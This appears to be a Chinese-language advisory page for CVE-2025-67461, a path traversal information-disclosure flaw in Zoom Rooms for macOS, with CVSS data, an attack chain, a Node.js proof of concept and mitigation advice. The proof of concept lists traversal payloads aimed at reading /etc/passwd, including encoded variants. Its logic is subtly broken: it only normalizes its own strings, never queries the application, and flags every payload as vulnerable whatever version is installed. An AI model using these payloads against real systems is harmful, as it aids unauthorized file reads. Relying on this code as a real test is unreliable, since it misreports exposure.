CVE-2025-67461: Zoom Rooms for macOS 路径遍历导致信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-67461

漏洞类型

路径遍历

CVSS评分

5.0 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Zoom Rooms for macOS

漏洞概述

CVE-2025-67461是Zoom Rooms for macOS版本6.6.0之前存在的一个信息泄露漏洞。该漏洞属于外部控制文件名或路径（External control of file name or path）类型，允许经过身份验证的本地用户通过特定操作获取敏感信息。攻击者可以利用此漏洞在未授权的情况下访问系统上的机密文件或数据。由于漏洞需要本地访问和用户交互才能触发，因此实际利用难度较高，但仍然对用户数据安全构成威胁。Zoom公司已于2025年12月10日发布安全更新修复此问题，建议用户尽快升级至6.6.0或更高版本。

技术细节

该漏洞源于Zoom Rooms for macOS应用程序对文件路径处理不当，允许经过身份验证的用户通过操纵文件路径参数访问本应受保护的资源。攻击者通过本地访问方式，利用应用程序处理文件名的逻辑缺陷，可能实现目录遍历或访问任意文件内容。由于CVSS向量中机密性影响为高（C:H），而完整性和可用性无影响（I:N/A:N），表明该漏洞主要导致信息泄露风险，不会影响系统完整性或可用性。攻击需要低权限用户账户（PR:L）和用户交互（UI:R），限制了漏洞的广泛利用可能性。攻击者需要了解目标系统的文件结构才能有效利用此漏洞。

攻击链分析

STEP 1

1

攻击者获取Zoom Rooms for macOS目标系统的本地用户账户访问权限

STEP 2

2

攻击者启动Zoom Rooms应用程序并使用低权限账户进行身份验证

STEP 3

3

攻击者通过用户交互触发文件路径处理功能，利用路径遍历字符访问应用程序保护范围之外的文件

STEP 4

4

应用程序错误地将攻击者控制的路径参数传递给文件操作函数，导致读取任意文件内容

STEP 5

5

攻击者获取敏感信息（如系统配置文件、用户数据、凭据等），完成信息泄露攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-67461 PoC - Zoom Rooms for macOS Path Traversal Information Disclosure
// This PoC demonstrates the path traversal vulnerability in Zoom Rooms for macOS
// Note: This is a conceptual PoC for educational purposes only

const fs = require('fs');
const path = require('path');

// Target: Zoom Rooms for macOS before 6.6.0
const ZOOM_ROOMS_PATH = '/Applications/ZoomRooms.app/';

// Path traversal payloads to test
const payloads = [
    '../../../../etc/passwd',
    '../../../../Users/Shared/ZoomRooms/config/../../../../../etc/passwd',
    '..\\..\\..\\..\\etc\\passwd',
    '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',
    '..%252f..%252f..%252f..%252fetc%252fpasswd',
    '%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd'
];

// Check if Zoom Rooms is installed
function checkZoomRoomsInstalled() {
    try {
        return fs.existsSync(ZOOM_ROOMS_PATH);
    } catch (error) {
        console.error('Error checking Zoom Rooms installation:', error.message);
        return false;
    }
}

// Test path traversal vulnerability
async function testPathTraversal() {
    if (!checkZoomRoomsInstalled()) {
        console.log('Zoom Rooms not found on this system');
        return;
    }

    console.log('Testing CVE-2025-67461 Path Traversal vulnerability...');
    console.log('Target: Zoom Rooms for macOS < 6.6.0');
    console.log('Vulnerability: External control of file name or path');
    
    for (const payload of payloads) {
        try {
            // Attempt to access files using path traversal
            const targetPath = path.join(ZOOM_ROOMS_PATH, payload);
            const normalizedPath = path.normalize(targetPath);
            
            if (normalizedPath.startsWith(ZOOM_ROOMS_PATH)) {
                console.log(`[SAFE] Path normalized and within ZoomRooms directory`);
            } else {
                console.log(`[VULNERABLE] Path traversal detected: ${payload}`);
                console.log(`[VULNERABLE] Resolved path: ${normalizedPath}`);
            }
        } catch (error) {
            console.log(`Error testing payload ${payload}: ${error.message}`);
        }
    }
    
    console.log('\nRecommended action: Upgrade to Zoom Rooms for macOS 6.6.0 or later');
}

// Execute PoC
testPathTraversal();

影响范围

Zoom Rooms for macOS < 6.6.0

防御指南

临时缓解措施

目前最有效的缓解措施是将Zoom Rooms for macOS升级到6.6.0或更高版本。在无法立即升级的情况下，可采取以下临时措施：限制本地用户权限，避免使用高权限账户运行Zoom Rooms；启用系统级安全防护如Gatekeeper和XProtect；监控应用程序的文件访问行为；考虑使用端点防护软件检测异常文件操作。建议管理员优先安排升级计划，因该漏洞需要本地访问才能利用，远程攻击风险较低。